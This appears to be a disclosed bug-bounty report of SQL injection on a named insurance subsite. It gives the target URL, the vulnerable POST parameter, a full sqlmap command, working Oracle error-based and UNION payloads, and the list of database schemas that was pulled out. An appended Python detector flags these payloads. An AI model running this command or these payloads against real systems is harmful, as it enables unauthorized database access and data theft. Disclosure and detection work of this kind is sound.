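2016-04-18: Details reported to the vendor; awaiting vendor response
2016-04-20: Vendor confirmed; details disclosed to the vendor only
2016-04-30: Details disclosed to core white hats and experts in related fields
2016-05-10: Details disclosed to regular white hats
2016-05-20: Details disclosed to intern white hats
2016-06-04: Details disclosed to the public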
SQL injection vulnerability in a 泛华保险 subsite
Injection point: http://oamob.cninsure.net/common/cvar/CExec.jsp
txtCodeCondition=&txtShowWidth=&txtSQL=&mOperate=&txtCodeName=-2617&startIndex=&txtConditionField=&txtOther=&txtQueryResult=&txtVarData=&txtFrameName=
Injection parameter: txtCodeName
python sqlmap.py -u "http://oamob.cninsure.net/common/cvar/CExec.jsp" --data "txtCodeCondition=&txtShowWidth=&txtSQL=&mOperate=&txtCodeName=-2617&startIndex=&txtConditionField=&txtOther=&txtQueryResult=&txtVarData=&txtFrameName=" -p txtCodeName
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: txtCodeName (POST)
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
    Payload: txtCodeCondition=&txtShowWidth=&txtSQL=&mOperate=&txtCodeName=-2617' AND 9277=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(120)||CHR(122)||CHR(98)||CHR(113)||(SELECT (CASE WHEN (9277=9277) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(120)||CHR(120)||CHR(122)||CHR(113)||CHR(62))) FROM DUAL) AND 'TFMj'='TFMj&startIndex=&txtConditionField=&txtOther=&txtQueryResult=&txtVarData=&txtFrameName=

    Type: UNION query
    Title: Generic UNION query (NULL) - 7 columns
    Payload: txtCodeCondition=&txtShowWidth=&txtSQL=&mOperate=&txtCodeName=-2617' UNION ALL SELECT NULL,NULL,CHR(113)||CHR(120)||CHR(122)||CHR(98)||CHR(113)||CHR(101)||CHR(76)||CHR(106)||CHR(108)||CHR(118)||CHR(122)||CHR(121)||CHR(103)||CHR(99)||CHR(99)||CHR(113)||CHR(120)||CHR(120)||CHR(122)||CHR(113),NULL,NULL,NULL,NULL FROM DUAL-- &startIndex=&txtConditionField=&txtOther=&txtQueryResult=&txtVarData=&txtFrameName=
---
[11:35:18] [INFO] the back-end DBMS is Oracle
web application technology: JSP
back-end DBMS: Oracle
[11:35:18] [WARNING] schema names are going to be used on Oracle for enumeration as the counterpart to database names on other DBMSes
[11:35:18] [INFO] fetching database (schema) names
[11:35:18] [WARNING] reflective value(s) found and filtering out
available databases [16]:
[*] CNINSURE
[*] CTXSYS
[*] DBSNMP
[*] DMSYS
[*] EXFSYS
[*] MDSYS
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] SCOTT
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WMSYS
[*] XDB
Filter the input.
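An added example, not part of the original report: one way to flag POST bodies that carry the two payload types sqlmap reports above (the XMLType error-based form and the UNION query) and to decode their CHR() marker strings. The names inspect_body, decode_chr_runs and SIGNATURES are hypothetical, and the sample bodies are constructed, with the attack sample abridged from the UNION payload shown above.

```python
import re
from urllib.parse import parse_qsl, quote

# Signatures drawn from the two payload types in the sqlmap output above.
SIGNATURES = {
    "chr_concat_chain": re.compile(r"(?:CHR\(\d+\)\s*\|\|\s*){3,}", re.I),
    "xmltype_error_based": re.compile(r"\bXMLType\s*\(", re.I),
    "union_select": re.compile(r"\bUNION\s+(?:ALL\s+)?SELECT\b", re.I),
}
CHR_RUN = re.compile(r"CHR\(\d+\)(?:\s*\|\|\s*CHR\(\d+\))+", re.I)

def decode_chr_runs(value):
    """Decode each CHR(n)||CHR(n)... run into the string Oracle would build."""
    return ["".join(chr(int(n)) for n in re.findall(r"\d+", run))
            for run in CHR_RUN.findall(value)]

def inspect_body(body):
    """Map each suspicious form field to its signature hits and decoded markers."""
    findings = {}
    # parse_qsl URL-decodes values, so encoded and raw payloads match alike.
    for name, value in parse_qsl(body, keep_blank_values=True):
        hits = [sig for sig, rx in SIGNATURES.items() if rx.search(value)]
        if hits:
            findings[name] = {"hits": hits, "markers": decode_chr_runs(value)}
    return findings

# Constructed samples: a benign body, and the page's UNION payload abridged.
BENIGN = "txtCodeName=PolicyType&startIndex=1"
ABRIDGED = ("-2617' UNION ALL SELECT NULL,NULL,"
            "CHR(113)||CHR(120)||CHR(122)||CHR(98)||CHR(113),NULL FROM DUAL-- ")
ENCODED = "txtCodeName=" + quote(ABRIDGED) + "&startIndex="

if __name__ == "__main__":
    for body in (BENIGN, ENCODED):
        print(inspect_body(body))
```

Signature matching of this kind suits log review or WAF rules; the injection itself is closed by binding txtCodeName as a query parameter instead of concatenating it into the SQL.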
Severity: Medium
Vulnerability Rank: 10
Confirmed: 2016-04-20 15:13
Thank you very much!
None yet